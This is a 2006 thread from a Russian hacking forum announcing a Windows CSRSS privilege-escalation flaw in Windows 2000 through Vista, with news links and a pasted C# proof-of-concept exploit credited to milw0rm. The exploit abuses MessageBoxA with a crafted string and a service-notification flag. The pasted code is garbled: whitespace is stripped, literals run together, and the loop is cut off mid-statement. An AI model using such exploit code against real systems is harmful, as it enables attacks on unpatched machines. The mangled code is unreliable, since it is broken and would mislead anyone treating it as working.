Vista first vulnerability

Discussion in 'Forum for discussion of ANTICHAT' started by Dracula4ever, 27 Dec 2006.

  1. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    A flaw discovered in the Windows Client/Server Runtime Server Subsystem (CSRSS) processes that allow privilege escalation attack.
    the flaw discovered by a russian dude known as NULL.
    vulnerable systems: windows 2000\XP\2003\Vista all fully patched. who said Vista has no code re-use.. :)
    links:
    http://www.securityfocus.com/brief/393
    http://www.informationweek.com/story/showArticle.jhtml?articleID=196701757
    http://www.symantec.com/enterprise/security_response/weblog/2006/12/vista_vulnerable.html
    http://lists.grok.org.uk/pipermail/full-disclosure/2006-December/051394.html
    http://www.kuban.ru/forum_new/forum2/files/19124.html

    exploit code taken from milw0rm:
    PHP:
    // mbox.cs
    using System;
    using System.Runtime.InteropServices;
    class 
    HelloWorldFromMicrosoft
    {
     [
    DllImport("user32.dll")]
     
    unsafe public static extern int MessageBoxA(uint hwndbytelpTextbytelpCaptionuint uType);

     static 
    unsafe void Main()
     {
       
    byte[] helloBug = new byte[] {0x5C0x3F0x3F0x5C0x210x210x210x00};
       
    uint MB_SERVICE_NOTIFICATION 0x00200000u;
       
    fixed(bytepHelloBug = &helloBug[0])
       {
         for(
    int i=0i&gtcsc /unsafe mbox.cs
    // >> mbox.exe

    // milw0rm.com [2006-12-20]
    i wonder if it's the same exploit code hackers were selling - http://www.eweek.com/article2/0,1895,2073611,00.asp ...
     
    1 person likes this.
  2. _Great_

    _Great_ Elder - Старейшина

    Joined:
    27 Dec 2005
    Messages:
    2,032
    Likes Received:
    1,119
    Reputations:
    1,139
    https://forum.antichat.ru/thread29837.html
     
  3. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    TRUTH? Began.... to be contined -)